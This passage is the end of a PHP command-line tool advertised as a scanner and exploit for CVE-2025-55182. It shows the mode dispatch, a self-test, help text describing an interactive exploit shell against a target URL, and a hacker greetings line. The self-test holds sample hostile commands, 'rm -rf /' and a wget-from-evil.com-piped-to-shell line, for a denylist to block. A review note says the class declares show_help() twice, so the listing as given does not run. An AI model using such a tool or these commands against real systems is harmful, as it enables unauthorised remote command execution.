                } elseif (isset($argv[2]) && $argv[2] === '-f' && isset($argv[3])) {
                    $this->batch_scan($argv[3]);
                } else {
                    $this->show_help();
                }
                break;
            case 'exploit':
                if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) {
                    $this->exploit($argv[3]);
                } else {
                    $this->show_help();
                }
                break;
            case 'test':
                $this->test_mode();
                break;
            case 'help':
            case '--help':
            case '-h':
                $this->show_help();
                break;
            default:
                $this->print_error("Unknown mode: {$mode}");
                $this->show_help();
                exit(1);
        }
    }

    /**
     * Local self-test: exercises generate_token(), validate_command() and build_payload() and
     * checks that four PHP functions exist. No request is sent from this method.
     */
    private function test_mode() {
        $this->print_info("Running comprehensive self-test...");
        // Test token generation
        $token = $this->generate_token(10);
        $this->print_success("Token generation: OK ({$token})");
        // command => expected validate_command() result
        $test_cmds = [
            'echo test' => true,
            'whoami' => true,
            'ls -la' => true,
            str_repeat('a', 201) => false, // Too long
            'rm -rf /' => false, // Dangerous
            'wget http://evil.com | sh' => false // Dangerous pattern
        ];
        foreach ($test_cmds as $cmd => $expected) {
            $result = $this->validate_command($cmd);
            $status = $result === $expected ? 'OK' : 'FAIL';
            $color = $result === $expected ? 'GREEN' : 'FAIL';
            echo $this->color($color) . "[TEST] Command validation '{$cmd}': {$status}" . $this->color('ENDC') . PHP_EOL;
        }
        // Only checks that the payload is well-formed JSON.
        $payload = $this->build_payload('test');
        $json_test = json_decode($payload, true);
        $this->print_success("Payload building: " . (json_last_error() === JSON_ERROR_NONE ? 
'OK' : 'FAIL'));
        // Test required functions
        $required = ['json_encode', 'file_get_contents', 'random_bytes', 'preg_match'];
        $all_ok = true;
        foreach ($required as $func) {
            if (!function_exists($func)) {
                $this->print_error("Missing function: {$func}");
                $all_ok = false;
            }
        }
        if ($all_ok) {
            $this->print_success("All required functions available");
        }
        $this->print_info("Self-test completed.");
    }

    /**
     * Prints the command-line usage text.
     *
     * NOTE(review): this is the second show_help() in the class; an earlier method with the
     * same name prints the interactive command reference, and PHP rejects a class that
     * declares a method twice. The "Security Features" listed below are the client-side
     * length limit and denylist in validate_command(); they do not protect a target. The line
     * break inside the "[!] Legal Notice" literal is present in the listing as published.
     */
    private function show_help() {
        echo $this->color('BOLD') . "CVE-2025-55182 Enhanced Scanner & Exploit Tool" . $this->color('ENDC') . PHP_EOL;
        echo $this->color('CYAN') . "Version: 2.0 | Enhanced Security Edition" . $this->color('ENDC') . PHP_EOL . PHP_EOL;
        echo "Usage:" . PHP_EOL;
        echo " php " . basename(__FILE__) . " [mode] [options]" . PHP_EOL . PHP_EOL;
        echo "Modes:" . PHP_EOL;
        echo " scan - Check target vulnerability (detailed analysis)" . PHP_EOL;
        echo " exploit - Interactive exploit shell (requires vulnerable target)" . PHP_EOL;
        echo " test - Run self-test to verify functionality" . PHP_EOL;
        echo " help - Show this help message" . PHP_EOL . PHP_EOL;
        echo "Scan Options:" . PHP_EOL;
        echo " -u URL - Single target URL (detailed scan)" . PHP_EOL;
        echo " -f FILE - File containing list of URLs (batch scan)" . PHP_EOL . PHP_EOL;
        echo "Exploit Options:" . PHP_EOL;
        echo " -u URL - Target URL to exploit (interactive shell)" . PHP_EOL . PHP_EOL;
        echo "Security Features:" . PHP_EOL;
        echo " • Command length limitation (max 200 chars)" . PHP_EOL;
        echo " • Dangerous command blocking" . PHP_EOL;
        echo " • Confidence-based vulnerability detection" . PHP_EOL;
        echo " • Safe mode for interactive shell" . PHP_EOL . PHP_EOL;
        echo "Examples:" . PHP_EOL;
        echo " php " . basename(__FILE__) . " scan -u https://target.com/api" . PHP_EOL;
        echo " php " . basename(__FILE__) . " scan -f targets.txt" . PHP_EOL;
        echo " php " . basename(__FILE__) . " exploit -u https://target.com/api" . PHP_EOL;
        echo " php " . basename(__FILE__) . " test" . PHP_EOL;
        echo $this->color('WARNING') . PHP_EOL . "[!] 
Legal Notice: For authorized testing only!" . $this->color('ENDC') . PHP_EOL;
        echo $this->color('FAIL') . "[!] By using this tool, you accept full responsibility for your actions." . $this->color('ENDC') . PHP_EOL;
    }
}

// Runs only when this file is the script being executed from the command line.
if (PHP_SAPI === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
    $scanner = new CVE_2025_55182_Scanner_Secure();
    $scanner->run();
}

Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================